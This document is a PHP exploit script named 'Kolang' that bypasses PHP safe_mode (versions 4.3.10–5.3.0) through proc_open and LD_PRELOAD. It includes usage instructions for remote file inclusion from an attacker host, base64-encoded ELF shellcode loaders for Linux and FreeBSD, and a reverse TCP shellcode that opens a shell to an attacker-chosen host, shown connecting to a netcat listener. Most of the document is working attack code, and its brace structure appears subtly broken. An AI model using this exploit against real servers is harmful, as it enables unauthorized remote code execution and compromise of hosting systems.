Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass - 体验盒子

<?php

/*

Kolang (PHP Safe mode bypass)

(IHSteam priv8 for lazy penetration testers)

(php 4.3.10 - 5.3.0)

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018(12/19/2009)

http://www.milw0rm.com/exploits/7393 (12/09/2008)

1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)

2- Kolang can execute arbitrary shellcode (just for fans of metasploit )

~~~~ How to use:)

for linux:

kolang.php?os=linux&host=LHOST&port=LPORT

or

kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE

for freebsd:

kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE

file inclusion :

http://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT

http://localhost/kolang.php?host=localhost&port=2121

hamid@bugtraq ~ $ nc -vv -l -p 2121

listening on [any] 2121 ...

connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526

id

uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)

Hamid Ebadi

http://www.bugtraq.ir

contact : ebadi~bugtraq~ir

Kolang means pickaxe (the idea came from amnafzar naming convention)

(Separ, Sarand, Alak, Skort)

*/

$port= intval($_REQUEST['port']);

$host= $_REQUEST['host'];

$os= $_REQUEST['os'];

/*

//compile : cc -o shellcode.so -fPIC -shared shellcode.c

//

//<?php

//$data=file_get_contents('shellcode.so');

//file_put_contents('shellcode_base64.txt',$data);

//?>

// "shellcode loader" : load and execute arbitrary shellcode from a file

// Hamid Ebadi

#define O_RDONLY 00 ; fcntl.h

#define SHELLCODE_MAX_SIZE 1024

// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'

#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"

void getuid()

{

unsetenv("LD_PRELOAD"); //not really necessary, we can remove it

int fd;

char shellcode[SHELLCODE_MAX_SIZE];

char filename[]=SHELLCODE_FILENAME ;

// we can also pass the shellcode in program's arguments

if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {

exit(1);

}

if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){

exit(1);

}

(*(void(*)()) shellcode)();

}

*/

if ($_REQUEST['os']=='freebsd'){

// freebsd shellcode loader (x86)

$shellcode_loader=

"f0VMRgEBAQkAAAAAAAAAAAMAAwABAAAAeAUAADQAAADsCQAAAAAAADQAIAADACgAFwAUAAEAAAAA

AAAAAAAAAAAAAADhBwAA4QcAAAUAAAAAEAAAAQAAAOQHAADkFwAA5BcAAPwAAAAYAQAABgAAAAAQ

AAACAAAA8AcAAPAXAADwFwAAoAAAAKAAAAAGAAAABAAAABEAAAAkAAAAAAAAAB0AAAAeAAAAIgAA

ABUAAAAAAAAAAAAAABoAAAAcAAAAIwAAACEAAAAbAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXAAAAFAAAABYA

AAAZAAAAAAAAAB8AAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJQAAAAAAAAAAwAB

AAAAAABwAQAAAAAAAAMAAgAAAAAAsAMAAAAAAAADAAMAAAAAAGQEAAAAAAAAAwAEAAAAAACUBAAA

AAAAAAMABQAAAAAA1AQAAAAAAAADAAYAAAAAAOgEAAAAAAAAAwAHAAAAAAB4BQAAAAAAAAMACAAA

AAAAJAcAAAAAAAADAAkAAAAAADAHAAAAAAAAAwAKAAAAAADkFwAAAAAAAAMACwAAAAAA7BcAAAAA

AAADAAwAAAAAAPAXAAAAAAAAAwANAAAAAACQGAAAAAAAAAMADgAAAAAAmBgAAAAAAAADAA8AAAAA

AKAYAAAAAAAAAwAQAAAAAACkGAAAAAAAAAMAEQAAAAAA4BgAAAAAAAADABIAAAAAAAAAAAAAAAAA

AwATAIQAAAAAAAAAAAAAABAAAAABAAAA8BcAAAAAAAARAPH/LAAAAAAAAAAAAAAAIAAAAH0AAABU

BgAAnQAAABIACAAgAAAA1AQAAAAAAAASAAYAOwAAAAAAAAAAAAAAIAAAAJcAAAAAAAAAAAAAABAA

AACjAAAA4BgAAAAAAAAQAPH/JgAAACQHAAAAAAAAEgAJAJwAAADgGAAAAAAAABAA8f8KAAAApBgA

AAAAAAARAPH/rwAAAPwYAAAAAAAAEADx/5IAAAAAAAAAAAAAABAAAACNAAAAAAAAAAAAAAAQAAAA

aQAAAAAAAAAAAAAAIAAAAFMAAAAAAAAAAAAAACAAAAAAX0RZTkFNSUMAX0dMT0JBTF9PRkZTRVRf

VEFCTEVfAF9pbml0AF9maW5pAF9fY3hhX2ZpbmFsaXplAF9fZGVyZWdpc3Rlcl9mcmFtZV9pbmZv

AF9fcmVnaXN0ZXJfZnJhbWVfaW5mbwBfSnZfUmVnaXN0ZXJDbGFzc2VzAGdldHVpZAB1bnNldGVu

dgBvcGVuAGV4aXQAcmVhZABfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZADkFwAACAAAAOgXAAAIAAAA

0BgAAAYWAADUGAAABhkAANgYAAAGIgAA3BgAAAYjAACwGAAABxQAALQYAAAHFgAAuBgAAAcZAAC8

GAAABxoAAMAYAAAHIAAAxBgAAAchAADIGAAAByIAAMwYAAAHIwAAg+wM6BQBAADoEwIAAIPEDMMA

AAD/swQAAAD/owgAAAAAAAAA/6MMAAAAaAAAAADp4P////+jEAAAAGgIAAAA6dD/////oxQAAABo

EAAAAOnA/////6MYAAAAaBgAAADpsP////+jHAAAAGggAAAA6aD/////oyAAAABoKAAAAOmQ////

/6MkAAAAaDAAAADpgP////+jKAAAAGg4AAAA6XD///9VieVT6AAAAABbgcMjEwAAUYC7PAAAAAB1

WIuTLAAAAIXSdB+D7Az/s0D////oXv///4PEEOsMkIPABImDRP/////Si4NE////ixCF0nXpi4Mw

AAAAhcB0EoPsDI2DSP///1DoOP///4PEEMaDPAAAAAGLXfzJw5BVieVT6AAAAABbgcOrEgAAUIuD

OAAAAIXAdBmD7AiNg0AAAABQjYNI////UOhH////g8QQi4P8////hcB0HouDNAAAAIXAdBSD7AyN

g/z///9Q6BH///+DxBCJ9otd/MnDkJCQVYnlV1ZTgew8BAAA6AAAAABbgcM/EgAAg+wMjYPW7v//

UOh9/v//g8QQjb24+///jbPh7v///LkSAAAA86SD7AhqAI2D4e7//1Dopf7//4PEEIlF5IN95AB5

CoPsDGoB6H/+//+D7ARoAAQAAI2F2Pv//1D/deToWP7//4PEEIXAeQqD7AxqAehX/v//jYXY+///

/9CNZfRbXl/Jw5CQkFWJ5VZT6AAAAABbgcOmEQAAjYPw////jXD8i0D86wiQg+4E/9CLBoP4/3X0

W17Jw4PsDOhM/v//g8QMwyRGcmVlQlNEOiBzcmMvbGliL2NzdS9pMzg2LWVsZi9jcnRpLlMsdiAx

LjcgMjAwNS8wNS8xOSAwNzozMTowNiBkZnIgRXhwICQATERfUFJFTE9BRAAvdG1wLy5YMTEtSUhT

VEVBTQAkRnJlZUJTRDogc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0bi5TLHYgMS42IDIwMDUvMDUv

MTkgMDc6MzE6MDYgZGZyIEV4cCAkAAAAAOQXAACcGAAAAAAAAAwAAADUBAAADQAAACQHAAAEAAAA

lAAAAAUAAACwAwAABgAAAHABAAAKAAAAtAAAAAsAAAAQAAAAAwAAAKQYAAACAAAAQAAAABQAAAAR

AAAAFwAAAJQEAAARAAAAZAQAABIAAAAwAAAAEwAAAAgAAAD6//9vAgAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAPAXAAAAAAAAAAAA

AP4EAAAOBQAAHgUAAC4FAAA+BQAATgUAAF4FAABuBQAAAAAAAAAAAAAAAAAAAAAAAABHQ0M6IChH

TlUpIDMuNC42IFtGcmVlQlNEXSAyMDA2MDMwNQAAR0NDOiAoR05VKSAzLjQuNiBbRnJlZUJTRF0g

MjAwNjAzMDUAAEdDQzogKEdOVSkgMy40LjYgW0ZyZWVCU0RdIDIwMDYwMzA1AAAuc3ltdGFiAC5z

dHJ0YWIALnNoc3RydGFiAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAucmVsLmR5bgAucmVsLnBsdAAu

aW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3RvcnMA

LmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAGwAAAAUAAAACAAAAlAAAAJQAAADcAAAAAgAAAAAAAAAEAAAABAAAACEA

AAALAAAAAgAAAHABAABwAQAAQAIAAAMAAAAUAAAABAAAABAAAAApAAAAAwAAAAIAAACwAwAAsAMA

ALQAAAAAAAAAAAAAAAEAAAAAAAAAMQAAAAkAAAACAAAAZAQAAGQEAAAwAAAAAgAAAAAAAAAEAAAA

CAAAADoAAAAJAAAAAgAAAJQEAACUBAAAQAAAAAIAAAAHAAAABAAAAAgAAABDAAAAAQAAAAYAAADU

BAAA1AQAABEAAAAAAAAAAAAAAAQAAAAAAAAAPgAAAAEAAAAGAAAA6AQAAOgEAACQAAAAAAAAAAAA

AAAEAAAABAAAAEkAAAABAAAABgAAAHgFAAB4BQAArAEAAAAAAAAAAAAABAAAAAAAAABPAAAAAQAA

AAYAAAAkBwAAJAcAAAwAAAAAAAAAAAAAAAQAAAAAAAAAVQAAAAEAAAACAAAAMAcAADAHAACxAAAA

AAAAAAAAAAABAAAAAAAAAF0AAAABAAAAAwAAAOQXAADkBwAACAAAAAAAAAAAAAAABAAAAAAAAABj

AAAAAQAAAAIAAADsFwAA7AcAAAQAAAAAAAAAAAAAAAQAAAAAAAAAbQAAAAYAAAADAAAA8BcAAPAH

AACgAAAAAwAAAAAAAAAEAAAACAAAAHYAAAABAAAAAwAAAJAYAACQCAAACAAAAAAAAAAAAAAABAAA

AAAAAAB9AAAAAQAAAAMAAACYGAAAmAgAAAgAAAAAAAAAAAAAAAQAAAAAAAAAhAAAAAEAAAADAAAA

oBgAAKAIAAAEAAAAAAAAAAAAAAAEAAAAAAAAAIkAAAABAAAAAwAAAKQYAACkCAAAPAAAAAAAAAAA

AAAABAAAAAQAAACOAAAACAAAAAMAAADgGAAA4AgAABwAAAAAAAAAAAAAAAQAAAAAAAAAkwAAAAEA

AAAAAAAAAAAAAOAIAABvAAAAAAAAAAAAAAABAAAAAAAAABEAAAADAAAAAAAAAAAAAABPCQAAnAAA

AAAAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAhA0AABAEAAAWAAAAMQAAAAQAAAAQAAAA

CQAAAAMAAAAAAAAAAAAAAJQRAAD1AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAlAAAAAAAAAADAAEAAAAAAHABAAAAAAAAAwACAAAAAACwAwAAAAAAAAMAAwAAAAAAZAQAAAAA

AAADAAQAAAAAAJQEAAAAAAAAAwAFAAAAAADUBAAAAAAAAAMABgAAAAAA6AQAAAAAAAADAAcAAAAA

AHgFAAAAAAAAAwAIAAAAAAAkBwAAAAAAAAMACQAAAAAAMAcAAAAAAAADAAoAAAAAAOQXAAAAAAAA

AwALAAAAAADsFwAAAAAAAAMADAAAAAAA8BcAAAAAAAADAA0AAAAAAJAYAAAAAAAAAwAOAAAAAACY

GAAAAAAAAAMADwAAAAAAoBgAAAAAAAADABAAAAAAAKQYAAAAAAAAAwARAAAAAADgGAAAAAAAAAMA

EgAAAAAAAAAAAAAAAAADABMAAAAAAAAAAAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAA

AAAAAAADABYAAQAAAAAAAAAAAAAABADx/yIAAAAAAAAAAAAAAAQA8f8xAAAAAAAAAAAAAAAEAPH/

AQAAAAAAAAAAAAAABADx/zwAAAAAAAAAAAAAAAQA8f9HAAAAkBgAAAAAAAABAA4AVQAAAJgYAAAA

AAAAAQAPAGMAAADsFwAAAAAAAAEADAB2AAAAoBgAAAAAAAABABAAgwAAAOgXAAAAAAAAAQALAIcA

AADgGAAAAQAAAAEAEgCTAAAAeAUAAAAAAAACAAgAqQAAAOQYAAAYAAAAAQASALIAAADwBQAAAAAA

AAIACAA8AAAAAAAAAAAAAAAEAPH/vgAAAJQYAAAAAAAAAQAOAMsAAACcGAAAAAAAAAEADwDYAAAA

7BcAAAAAAAABAAwA5gAAAKAYAAAAAAAAAQAQAPIAAAD0BgAAAAAAAAIACAAIAQAAAAAAAAAAAAAE

APH/IgAAAAAAAAAAAAAABADx/zEAAAAAAAAAAAAAAAQA8f8IAQAAAAAAAAAAAAAEAPH/KQEAAAAA

AAAAAAAABADx/zUBAADkFwAAAAAAAAECCwBCAQAAAAAAAAAAAAAQAAAASwEAAPAXAAAAAAAAEQDx

/1QBAAAAAAAAAAAAACAAAABjAQAAVAYAAJ0AAAASAAgAagEAANQEAAAAAAAAEgAGAHABAAAAAAAA

AAAAACAAAACIAQAAAAAAAAAAAAAQAAAAjQEAAOAYAAAAAAAAEADx/5kBAAAkBwAAAAAAABIACQCf

AQAA4BgAAAAAAAAQAPH/pgEAAKQYAAAAAAAAEQDx/7wBAAD8GAAAAAAAABAA8f/BAQAAAAAAAAAA

AAAQAAAAxgEAAAAAAAAAAAAAEAAAAMsBAAAAAAAAAAAAACAAAADfAQAAAAAAAAAAAAAgAAAAAC91

c3Ivc3JjL2xpYi9jc3UvaTM4Ni1lbGYvY3J0aS5TADxjb21tYW5kIGxpbmU+ADxidWlsdC1pbj4A

Y3J0c3R1ZmYuYwBfX0NUT1JfTElTVF9fAF9fRFRPUl9MSVNUX18AX19FSF9GUkFNRV9CRUdJTl9f

AF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AG9iamVj

dC4yAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBf

X0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAL3Vzci9zcmMvbGliL2NzdS9pMzg2LWVs

Zi9jcnRuLlMAc2hlbGxjb2RlLmMAX19kc29faGFuZGxlAHVuc2V0ZW52AF9EWU5BTUlDAF9fY3hh

X2ZpbmFsaXplAGdldHVpZABfaW5pdABfX2RlcmVnaXN0ZXJfZnJhbWVfaW5mbwByZWFkAF9fYnNz

X3N0YXJ0AF9maW5pAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABleGl0AG9wZW4A

X0p2X1JlZ2lzdGVyQ2xhc3NlcwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm8A";

}else{

// default: linux

// linux shellcode loader (x86)

$shellcode_loader=

"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

AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA

AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA

3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH

Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0

LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt

cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z

eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA

LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k

eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA

BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC

AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA

AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA

AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA

IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI

AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAAAAAAAAAF4AAAABAAAABgAAAKgD

AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAAAgBAAAIAQAAOgBAAAAAAAAAAAA

ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAAAAAAAEAAAAAAAAAHUAAAABAAAA

AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQAAAAIAAABEBgAARAYAAAQAAAAA

AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAI4A

AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAACVAAAAAQAAAAMAAAAcHwAAHA8A

AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AACAPAADIAAAABAAAAAAAAAAEAAAA

CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACoAAAAAQAAAAMAAAD0

HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAAAAGCAAABgQAAAEAAAAAAAAAAAA

AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAAAAAAAABAAAAAAAAAC8AAAAAQAA

AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMIQAADFAAAA

AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsAIAABoAAAAeAAAABAAAABAAAAAJ

AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAAAAAAAAAwADAAAAAABcAgAAAAAA

AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA

YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD

AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf

AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS

AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA

AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j

AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA

AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA

AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA

EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA

AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf

R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0

X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf

UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w

AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x

LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ;

}

if (!function_exists('file_put_contents')){

function file_put_contents($filename, $data){

$f = @fopen($filename, 'w');

if (!$f){

return false;

}

else{

$bytes = fwrite($f, $data);

fclose($f);

return $bytes;

}

// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'

file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));

$ip = gethostbyname($host);

$port1 = sprintf('%c', ($port>> 8)&255);

$port2 = sprintf('%c', ($port>> 0)&255);

$part = explode('.', $ip);

//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);

$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);

/*

* linux/x86/shell_reverse_tcp - 71 bytes

* http://www.metasploit.com

* Encoder: generic/none

* LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,

* PrependSetresuid=false, PrependSetreuid=false,

* PrependSetuid=false, PrependChrootBreak=false,

* AppendExit=false

*/

$Xshellcode=

"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80".

"\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2."\x66\x53\x6a\x10".

"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f".

"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".

"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00" ;

if(isset($_REQUEST['shellcode'])){

// just for fans of metasploit

$Xshellcode=base64_decode($_REQUEST['shellcode']);

}

file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);

$cwd = '/tmp/';

$env = array('LD_PRELOAD' => '/tmp/shellcode.so');

unset($var);

$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));

// BOOM

proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);

mail("IHSteam","IHSteam","IHSteam","IHSteam");

?>